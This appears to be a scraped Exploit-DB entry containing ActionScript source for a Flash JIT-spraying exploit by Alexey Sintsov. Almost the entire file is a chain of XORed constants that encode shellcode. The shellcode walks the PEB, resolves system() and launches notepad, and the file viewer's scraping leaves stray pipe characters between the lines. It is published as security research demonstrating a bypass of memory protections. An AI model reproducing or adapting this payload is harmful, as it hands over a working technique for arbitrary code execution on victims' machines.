166 lines
No EOL
2 KiB
C
166 lines
No EOL
2 KiB
C
/*
|
|
# Title: JITed exec notepad shellcode
|
|
# EDB-ID: ()
|
|
# CVE-ID: ()
|
|
# OSVDB-ID: ()
|
|
# Author: Alexey Sintsov
|
|
# Published:
|
|
# Verified: yes
|
|
# Download N/A
|
|
*/
|
|
|
|
// JIT.swf
|
|
//
|
|
// By Alexey Sintsov
|
|
// dookie@inbox.ru
|
|
// a.sintsov@dsec.ru
|
|
//
|
|
// DSecRG - Digital Security Research Group [dsecrg.com]
|
|
//
|
|
// PEB-DLL-System()-notepad
|
|
//
|
|
|
|
package {
|
|
import flash.display.MovieClip
|
|
public class Main extends MovieClip
|
|
{
|
|
function funcXOR1()
|
|
{
|
|
var jit=(0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c909090^
|
|
0x3c90C033^
|
|
0x3c9030b0^
|
|
0x3c008b64^
|
|
0x3c0c408b^
|
|
0x3c1c408b^
|
|
0x3c08508b^
|
|
0x3c20788b^
|
|
0x3c90008b^
|
|
0x6a6d3f80^
|
|
0x3c90eA75^
|
|
0x3c904747^
|
|
0x6a733f80^
|
|
0x3c90ef75^
|
|
0x3c904747^
|
|
0x6a763f80^
|
|
0x3c90ef75^
|
|
0x3c904747^
|
|
0x6a633f80^
|
|
0x3c90ef75^
|
|
0x3c529090^
|
|
0x3c3cc283^
|
|
0x3c903a8b^
|
|
0x3c24148b^
|
|
0x3c90d703^
|
|
0x3c78c283^
|
|
0x3c903a8b^
|
|
0x3c24148b^
|
|
0x3c90d703^
|
|
0x3c18c283^
|
|
0x3c903a8b^
|
|
0x3c04c283^
|
|
0x3c901a8b^
|
|
0x3c241c03^
|
|
0x3c04c283^
|
|
0x3c90328b^
|
|
0x3c243403^
|
|
0x3c04c283^
|
|
0x3c900a8b^
|
|
0x3c240c03^
|
|
0x3cb89090^
|
|
0x3c900000^
|
|
0x3c9065b0^
|
|
0x3c906db4^
|
|
0x3c905090^
|
|
0x3cb89090^
|
|
0x3c907473^
|
|
0x3c9073b0^
|
|
0x3c9079b4^
|
|
0x3c905090^
|
|
0x3c90d78b^
|
|
0x3c90ff33^
|
|
0x3c90C033^
|
|
0x3c535156^
|
|
0x14909090^
|
|
0x3c909090^
|
|
0x3c574790^
|
|
0x3c90C033^
|
|
0x3c24048b^
|
|
0x3c02e0c1^
|
|
0x3c90f003^
|
|
0x3c90068b^
|
|
0x3c18c483^
|
|
0x3c240403^
|
|
0x3c18ec83^
|
|
0x3c90c933^
|
|
0x3c9006b1^
|
|
0x3c10c483^
|
|
0x3c90f48b^
|
|
0x3c90f88b^
|
|
0x3c10c483^
|
|
0x6a90a6f3^
|
|
0x14901474^
|
|
0x3c1cec83^
|
|
0x3c595b5f^
|
|
0x3c90905e^
|
|
0x3c908beb^
|
|
0x3c1cec83^
|
|
0x3c595b5f^
|
|
0x3c90905e^
|
|
0x3c90e7d1^
|
|
0x3c90cf03^
|
|
0x3c90c033^
|
|
0x3c018b66^
|
|
0x3c02e0c1^
|
|
0x3c90c303^
|
|
0x3c90188b^
|
|
0x3c08c483^
|
|
0x3c241c03^
|
|
0x646170B8^
|
|
0x000000b9^
|
|
0x3C50c12b^
|
|
0x00B89090^
|
|
0x3c906574^
|
|
0x3c906fb4^
|
|
0x3C506eb0^
|
|
0x3cd3ff54^
|
|
0x3ccccccc);
|
|
|
|
return jit;
|
|
|
|
}
|
|
|
|
function Main()
|
|
{
|
|
var ret1=funcXOR1();
|
|
}
|
|
}
|
|
} |